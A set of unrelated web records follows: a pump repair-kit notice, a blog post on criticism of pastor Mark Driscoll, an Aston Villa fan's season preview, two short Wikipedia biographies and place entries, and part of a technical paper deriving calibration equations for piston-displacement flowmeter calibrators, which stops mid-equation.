The repair kits listed to the right are available for this pump. If you need further information about these repair kits, or have questions about other specific parts for your pump, please contact you local Giant distributor or contact Giant customer service.
Giant provides service on each pump and accessory that we sell. Many basic repair procedures are covered in the Giant repair manual. For all other questions on service or repair needs please contact your local Giant distributor.
|
{
"pile_set_name": "Pile-CC"
}
|
Since popular pastor Mark Driscoll asked his followers to share stories about “the most effeminate anatomically male worship leader you’ve ever personally witnessed,” other Christians have taken note of something many atheists have known for quite some time: Christianity doesn’t make you a better, kinder, or more empathetic person. If anything, the Christianity we’re used to is hypocritical, intolerant, and the source of so much pain for so many people.
It’s important to note that Driscoll didn’t say anything out of the ordinary here — not for him and not on behalf of many other “followers of Jesus.” Gay people are used to this type of bullying from prominent Christians.
The upside to all this is that some Christians are speaking out against Driscoll. Like Rachel Held Evan, who calls him a bully (in Christianese):
Mark Driscoll is wrong. Godly men stick up for people, not make fun of them. Godly men honor women, not belittle them. Godly men love their gay and lesbian neighbors, not ridicule them. Godly men celebrate femininity, not trash it. … If this Facebook status were Pastor Mark Driscoll’s first offense, it might not warrant a strong response. But Mark has developed a pattern of immaturity and unkindness that has remained largely unchecked by his church. In evangelical circles, he’s like the kid from high school who makes crude jokes at every opportunity, uses the words “gay” and “queer” to describe the things he most detests, encourages his friends to subject the unpopular kids to ridicule, and belittles the guys who aren’t “macho” or “manly” enough to be in his club.
Anthony Bradley at (Christian) World magazine called Rachel’s response “libel”:
There is nothing loving about calling a pastor a “bully“ — that is, “a blustering, quarrelsome, overbearing person who habitually badgers and intimidates smaller or weaker people.” That is a serious charge. In her post, Evans describes why she believes Driscoll to be a bully, implying that he, his teachings, and the elders at his church are not functioning in ways consistent with Scripture. While it is more than reasonable to understand why someone would take issue with Driscoll’s post, Evans’ way of responding cannot and should not be encouraged. What was even more disturbing was the way in which many other believers jumped on the slander bandwagon to feed on the carnage once it went viral.
Yeah… how *dare* a woman call out a pastor for not being properly Christian? She should know better and remain submissive and silent. (I’m curious what Bradley would have preferred she said…)
In any case, Rachel wasn’t the only person calling Driscoll out.
Tyler L. Clark expressed it beautifully, too:
The Church has been terrible to gays and lesbians. You have surely spent enough time talking with gay people in your community to know that the image of Christians tends to be a hateful one. In the same way that you want church culture to be more welcoming to blue-collar dudes, it also needs to be more welcoming to the gay and lesbian community. Your language… doesn’t help this. I am NOT calling you a misogynist or a [homophobe]. I’m simply suggesting that you reconsider how your words and actions are perceived. Your language is not only hurtful to gay men. It is hurtful to many straight men. As a man who has always been intimidated by more traditionally masculine men, your words tell me that I am not welcome in your church or among your friends.
It’s easy to pigeonhole all Christians into the anti-gay, anti-women umbrella, but there are some good ones out there and they’re as sick of this shit as we are.
…
Driscoll has since responded to the outcry with a non-apology apology:
I then put a flippant comment on Facebook, and a raging debate on gender and related issues ensued. As a man under authority, my executive elders sat me down and said I need to do better by hitting real issues with real content in a real context. And, they’re right. Praise God I have elders who keep me accountable and that I am under authority.
…
Coincidentally (or not), someone wrote to “Dear Abby” about a similar problem:
Dear Abby:
We have a problem — our pastor. He uses the pulpit to criticize, put people down and offers no compassion. A person can only take so much. The problem is, if you say anything to him, you can bet the next sermon will be about what you discussed. How can I talk to him without making him angry?
The response:
Your pastor’s behavior gives new meaning to the term “bully pulpit.” Rather than approach him yourself, you and others who feel as you do should take your complaint to the governing board of your church. And if that doesn’t fix the problem, you should seriously consider finding another “flock” to join because it appears your shepherd has lost his way.
|
{
"pile_set_name": "OpenWebText2"
}
|
I wanted to write this post because I'm going away for a few days and I think there are a few people that don't seem to grasp that we're actually in a very good place heading into the new season. And in my humble opinion, it's not as bad as some will have you believe.
But before I get to the post I want to tell you that the new owner of Aston Villa started following me on Twitter recently. After my post yesterday though, he stopped following me. I think my views about him have offended him and while I'd have hoped he was mature enough to see through or more to the point, over my opinion, apparently he isn't.
It does make me a little more worried and it does seem quite childish to stop following me, but at least he's stopped publicly instructing the CEO on Twitter, so I suppose he does learn. But his pram is bigger than mine and all that.
Anyway, that's another post and that post is getting more and more meat on it each day. This post is mostly about the manager, the squad of players we have and why it's not as bad as some will have you believe.
It's about the manager
And it's not as bad as many will have you believe because we were relegated because of bad managerial appointments which ultimately led to relegation.
So, if we accept that the managers have been poor and that the overall management has also been poor (look at some of those appointments), then we have to agree that it's not just the players that got us relegated and that the decision from the board and the day to day decisions from the managers, play a significant role in why we find ourselves in the Championship. So it's fair to assume that the manager will also play an important role in if we get promoted. And if you thought that, you'd be right.
And to be clear, I'm not saying that it's just about the manager, but I am saying he's the most important part of the team. So, forget about the players for a moment, it really all comes down to Di Matteo this season. But it's also worth pointing out that player wise, we're not in a bad way. Why? Remember what we all agreed on earlier; the managers were bad and to make my point; we have players that are of a Premier League and international quality.
We have a core group of players that are more then capable of playing Premier League football and with the right manager will be again next season.
But I'm going to look at them in more detail and if a player isn't mentioned below, it's because I expect them to be shipped out or sold very soon. And the sooner the better because the sooner they are gone, the sooner the impact will be felt with the current players and the entire Club.
In goal
We've got Pierluigi Gollini, Mark Bunn and Jed Steer. Three goalkeepers for a season should be more than enough and with the right management, I'm convinced we have enough quality there to get us promoted and I'd argue with anyone who disagrees, particularly because of the back four that comes next. And I think that is important, because we're a team.
The back four
We've got options here. In the middle we've got Tommy Elphick, Ciaran Clark, Nathan Baker, Jores Okore or Lescott. On the right we've got the option of Hutton, Lyden or Bacuna and on the left Bennet or Amavi with Baker as a last resort.
I want to point something out here; Hutton and Clark are both internationals, I'm told Elphick is a rock and was designed for the Championship and I'm convinced although I know not many others are that Lescott will want to show something to all Aston Villa fans this season and I believe he can be our player of the season. We've also got Amavi who will be playing left back for France later in his career.
This group of players have every reason to believe they will be able to create the best defensive unit in the Championship this season.
The five man midfield
Okay, when I write five man midfield, it's a variation of that and I suspect it will be a two-three, but that doesn't really matter. It's the players and the quality. And we have a few here, so I'm going to list them.
Leandro Bacuna
Idrissa Gueye
Ashley Westwood
Jordan Veretout
Adama Traoré
Gary Gardner
Jack Grealish
Aaron Tshibola
I don't need to write much more about the midfield because we have eight players; five that could play in the two role but also five that could play in the three role. Add to that, we've got Ayew that could drop into the three role as well as Lyden or Clark that could step up, it's a midfield more than capable and with enough experience and cover.
On the fringes we've also got André Green who I'm told looks very promising.
But, if there was one position on the pitch where I would say we could strengthen with the £50mn we've got to spend, it would be here. It would be here because I believe you put the right man in the middle of the park and it puts promotion firmly in the automatic place expectation, if they can stay fit and it turns out we have the right manager.
And for those that say we can't get the player, nobody thought at the start of last season that Leicester had the right players. Nobody. But they did and they also had the right manager. So don't start on the 'we can't attract the right players' line please because it's simply a myth that it isn't possible.
The strikers
Up front we've got Ayew, Kozak, Gestede with Hepburn-Murphy and Harry McKirdy on the fringes. If Ayew can stay fit I don't think there will be that many better strikers in the Championship next season, if the manager players to his strengths. But we've also got Gestede with experience of the league and Kozak who I suspect will do quite well in the Championship given the chance.
I honestly don't think we need more strikers and I do think the likes of Hepburn-Murphy given the chance could flourish (from what I'm told). In short, we've got cover for our preferred option and cover for the second and third way of playing. What more do we need?
Looking at the players above, I don't think anyone can say we don't have the quality to put out a very strong eleven in the Championship and I'm fairly confident that if you asked most supporters of other Championship clubs, most, if not all, would have us finishing in the top six and a large number would have us down for automatic promotion. And if we play the right way this season, we've got plenty of goals from all over the pitch because again, nobody can say we don't have the quality.
The most important person
So for me and I have to stress, this is just for me, we don't need new players. Sure, that one in the middle, but that player has to be special and not just adding to the squad we already have. And that isn't something we've done for a long time. But this was the picture before we got the new owner so I wonder why he said there was £50mn for new players but it doesn't surprise me that we've not brought in more.
But, if we could get that special player and by that I mean we'd have to pay him a special wage too, it would be the icing for me. But I also don't think we need him.
It does mean that Gabby, Richards, Sinclair, Sánchez, Cissokho and Guzan have gone, but I think we'd all agree that it's probably best for them and Aston Villa.
So if we all agree that we made bad managerial appointments from 2011 onwards and we know we did, then we also have to accept that if the majority of the squad above is good enough for the Premier League and we were relegated because of the managerial appointments, that the most important person next season is Roberto Di Matteo.
And that is why it comes down to mentality and the way we play football. Di Matteo has a huge job ahead of him but I think with Steve Clarke he's got the right man to help him. In short, I think we are ready, I'm not waiting for new players and I'm looking forward to next week. But that's just me.
Author: Damian
Damian started The Villa Blog as a passion project quite a few years ago while he was living in South Africa. Now living in Sweden, it continues. He's originally from Chasetown and grew up when supporting Villa meant there was a real chance of silverware at the start of every season.
|
{
"pile_set_name": "Pile-CC"
}
|
Milewo-Ruszczyny
Milewo-Ruszczyny is a village in the administrative district of Gmina Krasne, within Przasnysz County, Masovian Voivodeship, in east-central Poland. It lies approximately south of Przasnysz and north of Warsaw.
References
Milewo-Ruszczyny
|
{
"pile_set_name": "Wikipedia (en)"
}
|
Ahmad Tejan Sillah
Ahmad Tejan Sillah is a Sierra Leonean Shia Muslim scholar and Islamic preacher. He is the chief imam of the Freetown Central Mosque, one of the largest mosque in Sierra Leone. He is also one of the leaders of the Sierra Leone United Council of Imams, an Islamic organisation that is made up of imams across Sierra Leone. Sillah is one of the most prominent Islamic scholars in Sierra Leone. Sillah is a Shia Muslim of the Twelver branch of Shia Islam
Born and raised in Freetown, Sierra Leone, Sillah received a masters degree in Islamic studies at the Dar Al Tabligh Islamic University in the holy city of Qum in Iran. Sillah is an advocate for child and women's rights to be respected as stated in the Quran. He has often preached against violence in society and violence against women.
During Sierra Leone's civil war, Sillah was one of the leading advocates for peace. He traveled to dangerous rebel held areas of the country to preach to the rebels to lay down their arms and accept peace. In 2000, he was appointed by the United Nations Population Fund (UNFPA) as a Goodwill Ambassador.
Sillah is a founding member of the Inter-Religious Council of Sierra Leone, which is made up of both Muslim and Christian religious leaders.
Early life and education
Ahmad Tejan Sillah was born and raised in Freetown, the capital of Sierra Leone. He is a Shia Muslim cleric. He attended primary and secondary schools in Freetown. In 1974, he received a master's degree in Islamic studies at the Dar al-Tabligh in the holy city of Qum in Iran. He was an Islamic preacher for two years in Iran before returning to Sierra Leone. He is religiously close to Ayatollah Ali Khameinei, the spiritual leader of Iran.
Sillah served as an Islamist cultural advisor at the Iran embassy in Sierra Leone from 1983 to 1985. He was the chief imam of the Masjid Fatima Zahra mosque in Freetown from 1982 to 1985. He has been the chief imam of the Freetown Central Mosque since 1985. From 1986 to present he has served as the spiritual leader of the United Council of Imams in Sierra Leone, an organisation he is a founder member of. Since 1985, he has served as the Director of the Muslim Cultural Society in Sierra Leone and also Director of the Sierra Leone Ahl Ul Bayt World Assembly Sierra Leone, a humanitarian organisation that helps poor Sierra Leoneans. Sillah served as the principal of the International Institute of Islamic Studies in Freetown from 1991 to 1993.
Activist
Sillah is a founding member of the Inter-Religious Council of Sierra Leone, which is made up of both Muslim and Christian religious leaders. In 2000 he was appointed by the United Nations Population Fund Agency (UNFPA) as a Goodwill Ambassador.
Sillah has traveled across Sierra Leone and many other countries preaching peace, belief in the Koran and religious tolerance of non-Muslims.
He has used his own wealth to pay fees for poor students, sponsor students to attend college, and he is an advocate for child and women's rights to be respected as stated in the Quran. He has preached against violence in society and against women. Sillah has preached that most of what exists in a true democratic society had existed in Islam long before democracy itself took place in the Western World.
References
Category:Living people
Category:Muslim activists
Category:Sierra Leonean Shia Muslims
Category:Sierra Leonean Muslim activists
Category:Sierra Leonean imams
Category:People from Freetown
Category:Year of birth missing (living people)
|
{
"pile_set_name": "Wikipedia (en)"
}
|
1. Introduction
===============
Fluid flowmeter calibration methods use a variety of techniques; they include wide ranges of operational parameters; they cover wide ranges of precision and accuracy, \[[@b1-jresv97n5p509_a1b]--[@b3-jresv97n5p509_a1b]\]. Increasingly, the diverse improvements being sought for flowmeters are producing corresponding improvements in the characteristics of flowmeter calibration systems. Of these systems, the piston displacement-type calibrator offers advantages such as compactness, mobility, efficient change of fluid, and prospects for state-of-the-art performance characteristics.
To characterize the performance of a piston displacement calibrator, which produces a pulsed output signal that is proportional to the volumetric flowrate, the objective is, generally, to determine the "pulses per volume displacement" ratio (or its reciprocal) where the pulse output is assumed to come from a source such as a linear encoder. This pulse output is also assumed to be proportional to the piston displacement. High accuracy calibrator performance requires examination of these assumptions.
A number of techniques can be used to determine volumetric displacement. It is assumed in what follows that the displaced fluid is a liquid, but the principles apply to gases or mixtures of gases and liquids as well. It is also assumed that both temperature and pressure effects on all the components of the piston displacement system, the cylinder, encoder, and fluid should be considered in order that high accuracy performance can be achieved.
Depending upon the desired uncertainty level for the performance of the calibrator, one or more of the pressure and temperature effects on the components of the system may be negligible. When this is so, it may be permissible to disregard such effects to simplify data processing or to reduce the size of the controlling software for the system. Alternatively, and more preferably, all effects can be included in computer software. In this way, the terms which are negligible will not influence the results when higher levels of uncertainty, i.e., less precise performance can be tolerated or is desirable from benefits vs. costs perspectives. More importantly, where high accuracy is required, more of the figures available via the software capabilities can be accepted as significant.
The volumetric-type calibrator system, using encoded piston displacement as both the flow source and as the flow determination scheme, is sketched in [Fig. 1](#f1-jresv97n5p509_a1b){ref-type="fig"}. The piston motion produces and measures a fluid volumetric flowrate that is proportional to the encoder frequency. The piston in the cylinder has a seal that is assumed to seal perfectly for all piston velocities. The corresponding fluid flowrate through the meter and the meter output frequency enable a calibration of the flowmeter. Using these elements, three steps are considered.
The first step is determining the calibrator factor which is an "encoder pulses per volume displaced" ratio (or its reciprocal) at the defined set of reference conditions. These results can be obtained experimentally in a number of ways: (1) by physical measurement, (2) by the so-called "draw" technique, or (3) by using a transfer standard such as a single or, preferably, a tandem arrangement of calibrated turbine flowmeters.
The second step is the use of the characterized calibrator to calibrate a pulsed-output flowmeter such as a turbine meter or other device where the meter factor is a "pulses per volume" quantity or its reciprocal. This process is done with one or more selected fluids and at specified conditions. In what follows turbine flowmeters will be considered. Conventionally, turbine meter results are produced in the form of a meter factor which has units of pulses per volume or volume per pulses (referenced to specified conditions). This meter factor is determined over the desired ranges of fluid conditions and flowrate expressed in terms of a ratio of inertial-to-viscous effects such as a Reynolds number, or equivalent parameter.
The third step is the use of the characterized turbine flowmeter to calculate a fluid flowrate under actual conditions of use. The results can be produced with respect to specified reference conditions or to the actual conditions, depending upon the needs of the meter operator.
The purpose of this paper is to describe these three steps and give the pertinent relationships that pertain to each procedure. The resulting equations are intended to be used in the software packages used with these types of calibrators and metering units. In this way, it is expected that the measurement performance of both the calibrators and the metering units can be maximized.
2. Calibrator Characterization
==============================
2.1 Geometrical Determination at Reference Conditions
-----------------------------------------------------
To perform the required measurements at reference conditions and then calculate the calibrator factor in units of pulses per fluid volume displaced, the system analyzed is that sketched in [Fig. 2](#f2-jresv97n5p509_a1b){ref-type="fig"}. The assumption of reference conditions is a conceptual situation that is impractical to achieve precisely but is done solely for convenience, as will be clear in what follows. For the conditions selected to be the reference conditions which are denoted by the "0" subscript, a specific piston stroke produces a displacement volume, *V*~C0~, and the encoder produces the corresponding number of pulses, *N*~E0~. A list of symbols is given in the Glossary. The reference conditions of calibrator temperature and the pressure in the calibrator are *T*~C0~ and P~C0~, respectively. These properties are assumed to be constant and steady in the calibrator volume. These conditions should be monitored, quantified, and assessed with respect to the performance level of the calibrator. Furthermore, the fluid inside and outside the calibrator is assumed to have the same temperature as the cylinder of the calibrator and no heat is being transferred to or from the calibrator. In all that follows, the reference conditions of *T*~0~ and *P*~0~ will be assumed to be the same for all components.
The specified piston stroke, *L*~E0~, produces the pulse total, *N*~E0~, where $$N_{E0} = L_{E0}K_{E0},$$and *K*~E0~ is the encoder constant in pulses per length at the reference temperature condition, *T~0~.* The calibration constant can be written $$K_{C0} = \frac{N_{E0}}{V_{C0}} = \frac{L_{E0}K_{E0}}{{\overline{A}}_{C0}L_{E0}} = \frac{K_{E0}}{{\overline{A}}_{C0}},$$in units of pulses per volume, where, at the reference conditions, *Ā*~C0~ is the averaged cylinder cross-sectional area over the piston stroke, *L*~E0~. This calibrator constant, *K*~C0~ is assumed to be constant over the operating range of the calibrator.
For the calibrator configuration shown in [Fig. 1](#f1-jresv97n5p509_a1b){ref-type="fig"}, the area *Ā*~C0~ is an annular one between the cylinder of the calibrator and the rod or tube attached to the piston. The precision with which *K*~C0~ is determined can be written using root-sum-square combinations of component precisions: $$\begin{array}{l}
{\frac{\Delta K_{C0}}{K_{C0}} < \left\lbrack {\left( \frac{\Delta N_{E0}}{N_{E0}} \right)^{2} + \left( \frac{\Delta V_{C0}}{V_{C0}} \right)^{2}} \right\rbrack^{1/2}} \\
{= \left\lbrack {\left( \frac{\Delta K_{E0}}{K_{E0}} \right)^{2} + \left( \frac{\Delta{\overline{A}}_{C0}}{{\overline{A}}_{C0}} \right)^{2}} \right\rbrack^{1/2},} \\
\end{array}$$where the numerators of the respective terms refer to the maximum errors of each of the component measurements. [Equation (3)](#fd3-jresv97n5p509_A1b){ref-type="disp-formula"} indicates that high levels of precision in *K*~C0~ can be attained when large pulse sums, *N*~E0~, and large displaced volumes, *V*~C0~, are used. Correspondingly, these precision levels can be achieved with accurate and sensitive linear encoders and accurately measured and large cross-sectional areas.
2.2 Geometrical Determination at Non-Reference Conditions
---------------------------------------------------------
To perform the required measurements at non-reference temperature and pressure conditions, it is assumed that these conditions are constant and steady as shown in [Fig. 3](#f3-jresv97n5p509_a1b){ref-type="fig"}. For a specified piston stroke, *L*~E~, the corresponding encoder pulse total, *N*~E~, is $$N_{E} = N_{E}K_{E},$$where the encoder constant, *K*~E~, is assumed to depend only on temperature according to $$K_{E} = K_{E0}\left\lbrack {1 - \alpha_{E}\left( {T_{E} - T_{E0}} \right)} \right.,$$where *α*~E~ is the pertinent linear expansion coefficient for the encoder and *T*~E~ and *T*~E0~ are, respectively, the encoder temperatures at non-reference and reference conditions.
The cross-sectional area change of the calibrator cylinder that is produced by temperature, *T*~C~, and internal fluid pressure, *P*~C~, in excess of the reference values is analyzed in [Appendix A](#app1-jresv97n5p509_A1b){ref-type="app"}. In what follows, it is assumed that the annular area contained between the calibrator cylinder and the rod or tube connected to the piston is changed with temperature in the usual way and the pressure effect is considered to enlarge only the cylinder of the calibrator. The pressure effect on the tube or rod is taken to be negligible. The cross-sectional area of the cylinder of the calibrator averaged over the stroke length is given, to first order in temperature and pressure separately, by $${\overline{A}}_{C} = {\overline{A}}_{C0}\left\lbrack {1 + 2\alpha_{C}\left( {T_{C} - T_{0}} \right)} \right\rbrack\left\lbrack {1 + \frac{\left( {P_{C} - P_{0}} \right)D_{C0}}{t_{C0}E_{C}}} \right\rbrack,$$where *α*~C~ is the linear expansion coefficient for the material of the calibrator cylinder, *D*~C0~ and *t*~C0~ are, respectively, the inside diameter and wall thickness of the calibrator cylinder at reference conditions and *E*~C~ is the modulus of elasticity of the material of the calibrator cylinder. In [Eq. (6)](#fd6-jresv97n5p509_A1b){ref-type="disp-formula"} the compressive effects of the pressure in the cylinder on the rod attached to the piston are assumed negligible.
If it is assumed that the linear expansion coefficient of the cylinder material is 2 × 10^−5^ °C^−1^, a systematic temperature difference of only 2.5 °C would produce a corresponding systematic error of±0.01% in the calibrator area. Similarly, if it is assumed that the modulus of elasticity for the calibrator material is 2×10^11^ Pa (2×l0^6^atm) and if the calibrator has a diameter to thickness ratio of 20, a systematic pressure error of only 1 MPa (10 atm) will produce a systematic error of±0.01% in the calibrator area. Such calibrator area errors will propagate through all of the successive relationships for calibrating and using meters, and these relationships will be further altered by additional temperature and pressure effects.
The calibrator constant, *K*~C~, at non-reference conditions in units of pulses per volume can be written $$K_{C}\frac{N_{E}}{V_{C}},$$since *V*~C~ is the displacement at non-reference conditions. Therefore $$K_{C} = \frac{K_{E}}{{\overline{A}}_{C}}.$$Combining [Eq. (8)](#fd8-jresv97n5p509_A1b){ref-type="disp-formula"} with [Eqs. (2)](#fd2-jresv97n5p509_A1b){ref-type="disp-formula"}, [(5)](#fd5-jresv97n5p509_A1b){ref-type="disp-formula"}, and [(6)](#fd6-jresv97n5p509_A1b){ref-type="disp-formula"} produces $$K_{C} = \frac{K_{C0}\left\lbrack {1 - \alpha_{E}\left( {T_{E} - T_{0}} \right)} \right\rbrack}{\left\lbrack {1 + 2\alpha_{C}\left( {T_{C} - T_{0}} \right.} \right\rbrack\left\lbrack {1 + \frac{\left( {P_{C} - P_{0}} \right)D_{C0}}{t_{C0}E_{C}}} \right\rbrack},$$or, to first order approximation: $$K_{C0} = K_{C}\frac{\left\lbrack {1 + \alpha_{E}\left( {T_{E} - T_{0}} \right)} \right\rbrack}{\left\lbrack {1 - 2\alpha_{C}\left( {T_{C} - T_{0}} \right.} \right\rbrack\left\lbrack {1 - \frac{\left( {P_{C} - P_{0}} \right)D_{C0}}{t_{C0}E_{C}}} \right\rbrack}.$$For temperatures and pressures higher than reference conditions the calibrator constant, *K*~C~, is less than the value at reference conditions. In both of the above geometrical methods for obtaining calibrator constants, fluid properties are not involved.
The value for *K*~C0~ given by [Eqs. (2)](#fd2-jresv97n5p509_A1b){ref-type="disp-formula"} or [(10)](#fd10-jresv97n5p509_A1b){ref-type="disp-formula"} should be put into the software that operates the displacement calibrator, together with pertinent material constants and component dimensions. Then the computation for the calibrator constant *K*~C~ at non-reference conditions can be done using appropriate measurements for encoder temperature, in addition to the pressure and temperature in the calibrator, as shown in [Eq. (9)](#fd9-jresv97n5p509_A1b){ref-type="disp-formula"}. These values of *K*~C0~ or *K*~C~ will be used for the accurate calibrations of flowmeters.
2.3 Determination of Calibrator Constant by the Draw Technique at Reference Conditions
--------------------------------------------------------------------------------------
The configuration for the draw technique is shown in [Fig. 4](#f4-jresv97n5p509_a1b){ref-type="fig"}, where the piston stroke displaces an amount of fluid through a valve into the collection tank; the corresponding encoder pulses total N~EO~. All temperatures and pressures are the reference values. In all that follows, it is assumed that the seal of the piston in the calibrator seals perfectly and is sufficiently pliant to continue to seal perfectly when changes in temperature and internal pressure occur and change the diameter of the cylinder of the calibrator. Applying conservation of mass principles to the constant volume shown in [figure 4](#f4-jresv97n5p509_a1b){ref-type="fig"}, we obtain: $$\frac{\partial}{\partial t}{\int_{V}{\rho dV - {\int_{s}{\rho\mathbf{\upsilon}}}}} \cdot \mathbf{n}\ dS = 0,$$where *ρ* is the fluid density, *V* is the control volume surrounded by the control surface, *S*,***υ*** is the fluid velocity vector, and ***n*** is the unit vector normal to *S* with positive direction pointing to the interior of *V.* When $$\frac{\partial}{\partial t}{\int_{V}{\rho dV = 0,}}$$there is no change of the mass within the control volume in time. This means the effects of fluid friction or of heat transfer are negligible or, taken in total, do not alter in time the mass contained within the control volume. Under such conditions, the inlet and outlet mass fluxes through the control surface, *S* are the same, that is $$\rho_{C0}\ {\overset{˙}{V}}_{C0} = \rho_{{COLL}^{’}T0\ }{\overset{˙}{V}}_{{COLL}^{’}T0},$$where *ρ*~C0~ and *ρ*~COLL'T0~ are the fluid densities, respectively, in the calibrator and collection tank at the same reference conditions and therefore are equal. The quantities ${\overset{˙}{V}}_{C0}$ and ${\overset{˙}{V}}_{{COLL}^{’}T0}$ are the volumetric flowrates out of the calibrator and into the collection tank, respectively.
Therefore, since the times of displacement and collection are assumed to be the same, $$V_{C0} = V_{{COLL}^{’}T0},$$and the calibrator constant, in units of pulses per displacement volume can be written $$K_{C0} = N_{E0}/V_{{COLL}^{’}T0},$$where $$V_{{COLL}^{’}T0} = {\overline{A}}_{C0}L_{E0}.$$Therefore, using [Eq. (13)](#fd13-jresv97n5p509_A1b){ref-type="disp-formula"}--[(16)](#fd16-jresv97n5p509_A1b){ref-type="disp-formula"}, we obtain $$K_{C0} = K_{E0}/{\overline{A}}_{C0},$$in agreement with [Eq. (2)](#fd2-jresv97n5p509_A1b){ref-type="disp-formula"}. Accordingly, results obtained via this procedure should duplicate those obtained via the geometrical measurement techniques.
It is generally assumed that the calibrator constant *K*~C0~ is independent of the piston speed or the fluid properties. If this assumption is not valid then it is necessary to characterize the dependence. This should be done in a manner analogous to the procedures used to characterize turbine meters as given below.
It should be noted that, for the control volume shown in [Fig. 4](#f4-jresv97n5p509_a1b){ref-type="fig"}, if $$\frac{\partial}{\partial t}{\int_{V}{\rho dV \neq 0,}}$$then the mass flux displaced in the cylinder of the calibrator is not equal to that delivered to the collection tank. Furthermore, if the fluid density in the control volume decreases because of a temperature rise then the mass flux to the collection tank would be more than that displaced in the calibrator cylinder. As will be seen below, this produces a turbine-type meter calibration result in pulses per volume units that is larger than it should be. Conversely, if the fluid density in the control volume increases, then the mass flux delivered to the collection vessel is less than that displaced in the calibrator cylinder. This produces a low calibration result for a turbine meter constant in pulses per volume units.
2.4 Determination of Calibrator Constant by the Draw Technique at Non-Reference Conditions
------------------------------------------------------------------------------------------
The configuration for the draw technique in non-reference conditions is shown in [Fig. 5](#f5-jresv97n5p509_a1b){ref-type="fig"}. As before, the piston stroke displaces a volume of fluid in the cylinder and the corresponding encoder pulses total *N*~E~. The temperature and pressure of the fluid in the cylinder are *T*~C~ and *P*~C~, respectively. Applying conservation of mass principles to the control volume in [Fig. 5](#f5-jresv97n5p509_a1b){ref-type="fig"}, for the condition where there is no change with time of the mass within the control volume, [Eq. (11)](#fd11-jresv97n5p509_A1b){ref-type="disp-formula"} and [(12)](#fd12-jresv97n5p509_A1b){ref-type="disp-formula"} indicate that $$\rho_{C}{\overset{˙}{V}}_{C} = \rho_{{COLL}^{’}T}{\overset{˙}{V}}_{{COLL}^{’}T},$$or when the displacement and collected volumes are simultaneous $$\rho_{C}V_{C} = \rho_{{COLL}^{’}T}V_{{COLL}^{’}T},$$where *ρ*~C~ and *ρ*~COLL'T~ are, respectively, the density of the fluid displaced within the cylinder of the calibrator and flowing from the valve and into the collection tank. The volume *V*~COLL'T~ can be determined using volumetric or gravimetric techniques, or both. It is noted that constant conditions of temperature and pressure need to be maintained in the calibrator and in the collection vessel for accurate results.
With the volume *V*~COLL'T~ determined, *V*~C~ can be computed via $$V_{C} = \left( {\rho_{{COLL}^{’}T}/\rho_{C}} \right)V_{{COLL}^{’}T},$$where, according to the definitions of fluid thermal expansion effects and compressibility, to first order in temperature and pressure, separately: $$\begin{array}{l}
{\frac{\rho_{{COLL}^{’}T}}{\rho_{C}} =} \\
{\left\lbrack {1 - 3\alpha_{F}\left( {T_{{COLL}^{’}T} - T_{C}} \right)} \right\rbrack{\left\lbrack {1 + \frac{\left( {P_{{COLL}^{’}T} - P_{C}} \right)}{E_{F}}} \right\rbrack,}} \\
\end{array}$$where *α*~F~ is the linear expansion coefficient for the fluid, the pressures *P*~COLL'T~ and *P*~C~ are, respectively, those for the fluid passing from the valve into the collection tank and in the cylinder of the calibrator, and *E*~F~ is the modulus of elasticity of the fluid. It is noted that both α~F~ and *E*~F~ are dependent upon temperature and pressure for the specific fluid, but the values used here and in what follows are assumed to be averages taken over the appropriate ranges of temperature and pressure. It is also noted here that the reciprocal of the modulus of elasticity of the fluid is also the compressibility of the fluid.
In [Eq. (22)](#fd22-jresv97n5p509_A1b){ref-type="disp-formula"}, it is noted that temperature and pressure effects have opposite signs in producing fluid density changes. However, when the temperature differences between the collection vessel and the calibrator are large and where the pressure in the calibrator is much larger than that in the collection vessel, the effects on the fluid can be significant.
If it is assumed that the linear expansion coefficient of a hydrocarbon liquid is 3 × 10^−4^ °C^−1^, a systematic temperature error of only 1 °C will produce a systematic error of 0.1% due to temperature in the determination of the calibrator volume by this draw method. Similarly, if it is assumed that the fluid's modulus of elasticity is 2 × 10^9^ Pa (2 × 10^4^ atm), a systematic pressure error of only 2 MPa (20 atm) will produce a systematic error of ±0.1% in the calibrator volume. As mentioned above, such errors will propagate through all of the relationships for calibrating and using meters and these errors will be further altered by additional temperature and pressure corrections.
Furthermore, using [Eq. (7)](#fd7-jresv97n5p509_A1b){ref-type="disp-formula"} we can write $$K_{C} = \frac{N_{E}}{\left( \frac{\rho_{{COLL}^{’}T}}{\rho_{C}} \right)V_{{COLL}^{’}T}},$$then, from [Eq. (22)](#fd22-jresv97n5p509_A1b){ref-type="disp-formula"} $$\begin{array}{l}
{K_{C} = \frac{N_{E}}{V_{{COLL}^{’}T}}\left\lbrack {1 + 3\alpha_{F}\left( {T_{{COLL}^{’}T} - T_{C}} \right)} \right\rbrack} \\
{\times \left\lbrack {1 - \frac{\left( {P_{{COLL}^{’}T} - P_{C}} \right)}{E_{F}}} \right\rbrack.} \\
\end{array}$$This result is then related to reference conditions via [Eq. (10)](#fd10-jresv97n5p509_A1b){ref-type="disp-formula"} to give $$\begin{array}{l}
{K_{C0} =} \\
\frac{N_{E}\left\lbrack {1 + 3\alpha_{F}\left( {T_{{COLL}^{’}T} - T_{C}} \right)} \right\rbrack\left\lbrack {1 - \frac{\left( {P_{{COLL}^{’}T} - P_{C}} \right)}{E_{F}}} \right\rbrack\left\lbrack {1 + \alpha_{E}\left( {T_{E} - T_{0}} \right)} \right\rbrack}{V_{{COLL}^{’}T}\left\lbrack {1 - 2\alpha_{C}\left( {T_{C} - T_{0}} \right)} \right\rbrack\left\lbrack {1 - \frac{\left( {P_{C} - P_{0}} \right)D_{C0}}{T_{C0}E_{C}}} \right\rbrack.} \\
\end{array}$$It is noted that the cross-sectional area, *Ā*~C~ can be determined via [Eqs. (8)](#fd8-jresv97n5p509_A1b){ref-type="disp-formula"} and [(23)](#fd23-jresv97n5p509_A1b){ref-type="disp-formula"} to be $${\overline{A}}_{C} = \frac{K_{E}}{N_{E}}\left( \frac{\rho_{{COLL}^{’}T}}{\rho_{C}} \right)V_{{COLL}^{’}T}.$$Using [Eqs. (5)](#fd5-jresv97n5p509_A1b){ref-type="disp-formula"}, [(6)](#fd6-jresv97n5p509_A1b){ref-type="disp-formula"} and [(22)](#fd22-jresv97n5p509_A1b){ref-type="disp-formula"}, this can be written in terms of directly measured quantities and related to reference conditions via $$\begin{array}{l}
{{\overline{A}}_{C0} =} \\
